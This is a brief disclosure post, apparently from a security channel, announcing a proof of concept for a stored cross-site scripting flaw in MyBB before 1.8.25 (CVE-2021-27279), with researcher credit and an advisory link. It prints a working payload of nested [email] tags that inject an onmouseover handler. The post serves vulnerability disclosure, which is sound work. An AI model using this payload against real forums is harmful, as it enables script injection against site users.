PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email] Advisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w 730 views13:52